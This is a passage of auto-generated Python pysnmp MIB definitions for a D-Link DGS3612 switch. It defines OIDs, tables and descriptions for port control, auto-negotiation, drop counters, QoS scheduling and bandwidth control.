if mibBuilder.loadTexts: swL2PortInfoNwayStatus.setDescription('This object indicates the port speed and duplex mode.')
swL2PortInfoErrDisReason = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("err-none", 1), ("storm-control", 2), ("lbd-control", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortInfoErrDisReason.setStatus('current')
if mibBuilder.loadTexts: swL2PortInfoErrDisReason.setDescription('This object indicates the port if disabled and why error disabled.')
swL2PortCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2), )
if mibBuilder.loadTexts: swL2PortCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlTable.setDescription('A table that contains control information about every port.')
swL2PortCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortCtrlPortIndex"), (0, "DGS3612-L2MGMT-MIB", "swL2PortCtrlMediumType"))
if mibBuilder.loadTexts: swL2PortCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlEntry.setDescription('A list of control information for each port of the device.')
swL2PortCtrlPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlPortIndex.setDescription("This object indicates the module's port number.(1..Max port number in the module)")
swL2PortCtrlMediumType = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("copper", 1), ("fiber", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlMediumType.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlMediumType.setDescription('Indicates medium type of the port number.')
swL2PortCtrlUnitIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlUnitIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlUnitIndex.setDescription('Indicates ID of the unit in the device')
swL2PortCtrlAdminState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAdminState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAdminState.setDescription('This object decide the port enabled or disabled.')
swL2PortCtrlNwayState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 8, 9, 10))).clone(namedValues=NamedValues(("other", 1), ("nway-enabled", 2), ("nway-disabled-10Mbps-Half", 3), ("nway-disabled-10Mbps-Full", 4), ("nway-disabled-100Mbps-Half", 5), ("nway-disabled-100Mbps-Full", 6), ("nway-disabled-1Gigabps-Full", 8), ("nway-disabled-1Gigabps-Full-master", 9), ("nway-disabled-1Gigabps-Full-slave", 10)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlNwayState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlNwayState.setDescription('Chose the port speed, duplex mode, and N-Way function mode.')
swL2PortCtrlFlowCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlFlowCtrlState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlFlowCtrlState.setDescription('The flow control mechanism is different between full duplex mode and half duplex mode. For half duplex mode, the jamming signal is asserted. For full duplex mode, IEEE 802.3x flow control function sends PAUSE frames and receives PAUSE frames.')
swL2PortCtrlLockState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlLockState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlLockState.setDescription('This object decide the port is locked or not.')
swL2PortCtrlMACNotifyState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlMACNotifyState.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlMACNotifyState.setDescription('This object set each port MAC notification state.')
swL2PortCtrlAutoNegRestart = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("restart", 1), ("norestart", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setReference('[IEEE802.3], 30.6.1.2.1, acAutoNegRestartAutoConfig.')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegRestart.setDescription('If the value of this object is set to restart(1) then this will force auto-negotiation to begin link renegotiation. If auto-negotiation signaling is disabled, a write to this object has no effect. Setting the value of this object to norestart(2) has no effect.')
swL2PortCtrlAutoNegCapAdvertisedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 2, 1, 12), IANAifMauAutoNegCapBits()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setReference('[IEEE802.3], 30.6.1.1.6, aAutoNegAdvertisedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlAutoNegCapAdvertisedBits.setDescription('A value that uniquely identifies the set of capabilities advertised by the local auto-negotiation entity. Capabilities in this object that are not available in swL2PortAutoNegInfoCapabilityBits cannot be enabled. Note that the local auto-negotiation entity may advertise some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortCtrlJumboFrame = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2PortCtrlJumboFrame.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlJumboFrame.setDescription("This object configure the switch's jumbo frame settings.")
swL2PortCtrlJumboFrameMaxSize = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortCtrlJumboFrameMaxSize.setStatus('current')
if mibBuilder.loadTexts: swL2PortCtrlJumboFrameMaxSize.setDescription("This object configure the switch's jumbo frame settings.")
swL2PortAutoNegInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8), )
if mibBuilder.loadTexts: swL2PortAutoNegInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoTable.setDescription("A table that contains information about every port's auto negotiation status.")
swL2PortAutoNegInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortAutoNegInfoPortIndex"))
if mibBuilder.loadTexts: swL2PortAutoNegInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoEntry.setDescription('A list of information for each port auto negotiation of the device.')
swL2PortAutoNegInfoPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoPortIndex.setDescription("This object indicates the module's port number.(1..Max port number in the module)")
swL2PortAutoNegInfoAdminStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setReference('[IEEE802.3], 30.6.1.1.2, aAutoNegAdminState, and 30.6.1.2.2, acAutoNegAdminControl.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoAdminStatus.setDescription(' If the value of this object is disabled(2) then the interface will act as it would if it had no auto-negotiation signaling. The status is affect by setting swL2PortCtrlNwayState.')
swL2PortAutoNegInfoCapabilityBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 3), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setReference('[IEEE802.3], 30.6.1.1.5, aAutoNegLocalTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapabilityBits.setDescription('A value that uniquely identifies the set of capabilities of the local auto-negotiation entity. Note that interfaces that support this MIB may have capabilities that extend beyond the scope of this MIB. Note that the local auto-negotiation entity may support some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortAutoNegInfoCapAdvertisedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 4), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setReference('[IEEE802.3], 30.6.1.1.6, aAutoNegAdvertisedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapAdvertisedBits.setDescription('A value that uniquely identifies the set of capabilities advertised by the local auto-negotiation entity. Capabilities in this object that are not available in swL2PortAutoNegCapabilityBits cannot be enabled. Note that the local auto-negotiation entity may advertise some capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortAutoNegInfoCapReceivedBits = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 8, 1, 5), IANAifMauAutoNegCapBits()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setReference('[IEEE802.3], 30.6.1.1.7, aAutoNegReceivedTechnologyAbility.')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setStatus('current')
if mibBuilder.loadTexts: swL2PortAutoNegInfoCapReceivedBits.setDescription('A value that uniquely identifies the set of capabilities received from the remote auto-negotiation entity. Note that interfaces that support this MIB may be attached to remote auto-negotiation entities that have capabilities beyond the scope of this MIB. This is indicated by returning the bit value bOther in addition to any bit values for standard capabilities that are listed in the IANAifMauAutoNegCapBits TC.')
swL2PortDropCounterTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9), )
if mibBuilder.loadTexts: swL2PortDropCounterTable.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterTable.setDescription('A table that contains information for each port drop counter.')
swL2PortDropCounterEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2PortDropCounterPortIndex"))
if mibBuilder.loadTexts: swL2PortDropCounterEntry.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterEntry.setDescription('A list of information for each port auto negotiation of the device.')
swL2PortDropCounterPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortDropCounterPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2PortDropCounterPortIndex.setDescription("This object indicates the module's port number.(1..Max port number in the module)")
swL2PortBufferFullDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortBufferFullDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortBufferFullDrops.setDescription('The total number of packets discarded while buffer full.')
swL2PortACLDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortACLDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortACLDrops.setDescription('The total number of packets denied by ACLs.')
swL2PortMulticastDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortMulticastDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortMulticastDrops.setDescription('The total number of multicast packet that is discarded.')
swL2PortVLANIngressDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 3, 9, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2PortVLANIngressDrops.setStatus('current')
if mibBuilder.loadTexts: swL2PortVLANIngressDrops.setDescription('The total number of packets discarded by VLAN ingress checking.')
swL2QOSBandwidthControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1), )
if mibBuilder.loadTexts: swL2QOSBandwidthControlTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthControlTable.setDescription('.')
swL2QOSBandwidthControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOSBandwidthPortIndex"))
if mibBuilder.loadTexts: swL2QOSBandwidthControlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthControlEntry.setDescription('A list of information contained in swL2QOSBandwidthControlTable.')
swL2QOSBandwidthPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthPortIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthPortIndex.setDescription('Indicates the port .')
swL2QOSBandwidthRxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(64, 10000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSBandwidthRxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRxRate.setDescription('Indicates RX Rate(1kbit/sec) of the specifed port. Value 10000000 means no limit.')
swL2QOSBandwidthTxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(64, 10000000))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSBandwidthTxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthTxRate.setDescription('Indicates TX Rate(1kbit/sec) of the specifed port. Value 10000000 means no limit.')
swL2QOSBandwidthRadiusRxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusRxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusRxRate.setDescription('The Rx Rate value comes from the RADIUS server, If an 802.1X port is authenticated, this value will overwrite the locally configured Rx Rate. ')
swL2QOSBandwidthRadiusTxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 1, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusTxRate.setStatus('current')
if mibBuilder.loadTexts: swL2QOSBandwidthRadiusTxRate.setDescription('The Tx Rate value comes from the RADIUS server, If an 802.1X port is authenticated, this value will overwrite the locally configured Tx Rate. ')
swL2QOSSchedulingTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2), )
if mibBuilder.loadTexts: swL2QOSSchedulingTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingTable.setDescription('.')
swL2QOSSchedulingEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOSSchedulingPort"), (0, "DGS3612-L2MGMT-MIB", "swL2QOSSchedulingClassID"))
if mibBuilder.loadTexts: swL2QOSSchedulingEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingEntry.setDescription('A list of information contained in swL2QOSSchedulingTable.')
swL2QOSSchedulingPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingPort.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingPort.setDescription('Indicates the port number.')
swL2QOSSchedulingClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingClassID.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingClassID.setDescription('Indicates the hardware queue number.')
swL2QOSSchedulingMaxPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 15))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMaxPkts.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMaxPkts.setDescription('Indicates the maximum number of packets the hardware priority queue will be allowed to transmit before allowing the next lowest priority queue to transmit its packets. a value between 0 and 15 can be specified.')
swL2QOSSchedulingMechanism = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanism.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanism.setDescription('Indicates the mechanism of QOS scheduling.')
swL2QOSSchedulingMechanismEffec = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismEffec.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismEffec.setDescription('Indicates the effective mechanism of QoS scheduling. If the swQoSSchedulingWeight is configured to be 0, then this object will always display strict (1).')
swL2QOS8021pUserPriorityTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3), )
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityTable.setDescription('.')
swL2QOS8021pUserPriorityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOS8021pUserPriorityIndex"))
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityEntry.setDescription('A list of information contained in swL2QOS8021pUserPriorityTable.')
swL2QOS8021pUserPriorityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityIndex.setDescription('The 802.1p user priority .')
swL2QOS8021pUserPriorityClass = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 6))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityClass.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pUserPriorityClass.setDescription("The number of the switch's hardware priority queue. The switch has four hardware priority queues available. They are numbered between 0 (the lowest priority) and 6 (the highest priority).")
swL2QOS8021pDefaultPriorityTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4), )
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityTable.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityTable.setDescription('.')
swL2QOS8021pDefaultPriorityEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2QOS8021pDefaultPriorityIndex"))
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityEntry.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityEntry.setDescription('A list of information contained in swL2QOS8021pDefaultPriorityTable.')
swL2QOS8021pDefaultPriorityIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 768))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityIndex.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriorityIndex.setDescription('Indicates the port number .')
swL2QOS8021pDefaultPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriority.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pDefaultPriority.setDescription('The priority value to assign to untagged packets received by the switch ports on the switch..')
swL2QOS8021pRadiusPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 4, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2QOS8021pRadiusPriority.setStatus('current')
if mibBuilder.loadTexts: swL2QOS8021pRadiusPriority.setDescription('Indicates the value of 802.1p comes from RADIUS server. If an 802.1X port is authenticated, this value will overwrite the local configured value.')
swL2QOSSchedulingMechanismCtrl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 3))).clone(namedValues=NamedValues(("strict", 1), ("weightfair", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismCtrl.setStatus('current')
if mibBuilder.loadTexts: swL2QOSSchedulingMechanismCtrl.setDescription('This object can control QOS scheduling Mechanism.')
swL2QOSHolPreventionCtrl = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2QOSHolPreventionCtrl.setStatus('current')
if mibBuilder.loadTexts: swL2QOSHolPreventionCtrl.setDescription('Control QOS Hol Prevention')
swCosBandwidthControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7), )
if mibBuilder.loadTexts: swCosBandwidthControlTable.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthControlTable.setDescription('A table that contains information about CoS Bandwidth Control on each port.')
swCosBandwidthControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swCosBandwidthPort"), (0, "DGS3612-L2MGMT-MIB", "swCosBandwidthClassID"))
if mibBuilder.loadTexts: swCosBandwidthControlEntry.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthControlEntry.setDescription('A list that contains CoS Bandwidth Control information for each port.')
swCosBandwidthPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swCosBandwidthPort.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthPort.setDescription('This object indicates the port number.')
swCosBandwidthClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 7))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swCosBandwidthClassID.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthClassID.setDescription('Indicates the hardware queue number.')
swCosBandwidthMinRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(64, 10000000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCosBandwidthMinRate.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthMinRate.setDescription('Indicates the Minimum Rate of the specified port. A value of 0 means no limit.')
swCosBandwidthMaxRate = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 7, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(ValueRangeConstraint(0, 0), ValueRangeConstraint(64, 10000000), ))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCosBandwidthMaxRate.setStatus('current')
if mibBuilder.loadTexts: swCosBandwidthMaxRate.setDescription('Indicates the Maximum Rate of the specified port. A value of 0 means no limit.')
swCpuRxRateControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8), )
if mibBuilder.loadTexts: swCpuRxRateControlTable.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlTable.setDescription('A table that contains information about CPU receiving rate control.')
swCpuRxRateControlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swCpuRxClassID"))
if mibBuilder.loadTexts: swCpuRxRateControlEntry.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlEntry.setDescription('A list that contains CPU CoS receiving rate control information.')
swCpuRxClassID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2)))
if mibBuilder.loadTexts: swCpuRxClassID.setStatus('current')
if mibBuilder.loadTexts: swCpuRxClassID.setDescription('Indicates the Class of Service ID.')
swCpuRxRateControlStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 6, 8, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swCpuRxRateControlStatus.setStatus('current')
if mibBuilder.loadTexts: swCpuRxRateControlStatus.setDescription('Indicates the status of receiving rate control.')
swL2PortSecurityControlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 7, 1), )
